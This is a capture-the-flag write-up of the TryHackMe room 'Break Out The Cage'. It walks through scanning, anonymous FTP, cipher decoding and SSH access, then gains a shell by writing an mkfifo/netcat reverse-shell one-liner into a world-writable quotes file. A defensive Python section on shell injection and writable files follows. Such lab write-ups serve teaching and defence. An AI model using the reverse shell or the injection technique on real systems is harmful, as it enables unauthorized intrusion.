[EN] TryHackMe Break Out The Cage WriteUp

PwnLab.Me

Written by Çağrı Ali Ceylan.

[EN] Break Out The Cage WriteUp


Hello everyone. In this article, we will solve the room named “Break Out The Cage” on TryHackMe together. Let’s get started right away.

Room’s Link: https://tryhackme.com/room/breakoutthecage1

Information Gathering


First of all, let’s scan the IP address given to us with nmap.

sudo nmap -A 10.10.7.223

We have 4 ports open, and we also see that we can log in anonymously via FTP. Let’s try it.

After connecting to FTP anonymously with the help of Filezilla, we find a file called dad_tasks. Let’s download it.


When we open the file, we see text encoded with base64. When we decode it, we get the text below.

Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.

Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

This text is encrypted with the Vigenère cipher. To decrypt it, we first need a key.

When looking at the open ports, we saw that port 80 was open, so a website is up. Let’s scan the directories with Gobuster.


When we dig through the directories a little, we find a directory named “auditions” with an audio file in it. When we play the audio file, we hear speech covered by static. Suspecting that something is hidden inside, we open it in Audacity and look at the spectrogram, which gives us the key for the Vigenère cipher.


After decrypting the text with the key, we get the plaintext below. It contains the password of the weston user, which we need.

Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.

In case I forget…. *************************************************

Action Time!


We log in to SSH as the user named “weston” with the above password.


Now that we’re logged in, let’s look for the files belonging to cage.

find / -user cage 2> /dev/null

The file “/opt/.dads_scripts/spread_the_quotes.py” caught my attention, so let’s take a look at its contents. It has a Python script in it, and when I look at its permissions, I see that everyone has permission to change the file, which is ideal for adding a reverse shell.


With these commands, we add our reverse shell to the quotes file.

cd /opt/.dads_scripts/.files

echo "asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f" > .quotes

And we are in! Let’s read the user flag.

cat Super_Duper_Checklist

Stay tuned for more content!
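
The escalation above depends on two things: a data file that other accounts can modify, and a privileged script that lets that data reach a shell. The following is an added example, not part of the original write-up and not the room's actual script; it assumes a script that splices a line from a quotes file into a shell command string, and `broadcast_unsafe`, `broadcast_safe`, `load_quotes` and the `echo` stand-in command are hypothetical names chosen for illustration.

```python
import os
import stat
import subprocess

# Constructed sample line: a harmless marker stands in for a real payload.
SAMPLE = "asd; echo INJECTED"

def broadcast_unsafe(quote):
    """Assumed vulnerable pattern: file content spliced into a shell command line."""
    # With shell=True, ';' in the quote ends 'echo' and starts a second command.
    return subprocess.run("echo " + quote, shell=True,
                          capture_output=True, text=True).stdout

def broadcast_safe(quote):
    """Hardened form: argument vector and no shell, so metacharacters stay data."""
    return subprocess.run(["echo", quote],
                          capture_output=True, text=True).stdout

def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def load_quotes(path):
    """Read quotes only from a file that other accounts cannot modify."""
    if writable_by_others(path):
        raise PermissionError(f"{path} is group/world-writable; refusing to use it")
    with open(path, encoding="utf-8") as fh:
        return [line.strip() for line in fh if line.strip()]

if __name__ == "__main__":
    # Unsafe: two output lines, because the text after ';' ran as a command.
    print("unsafe:", broadcast_unsafe(SAMPLE).splitlines())
    # Safe: one literal line, the ';' is just a character in the quote.
    print("safe:  ", broadcast_safe(SAMPLE).splitlines())
```

The same permission check belongs on the parent directory, since write access there allows the file to be replaced outright.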
 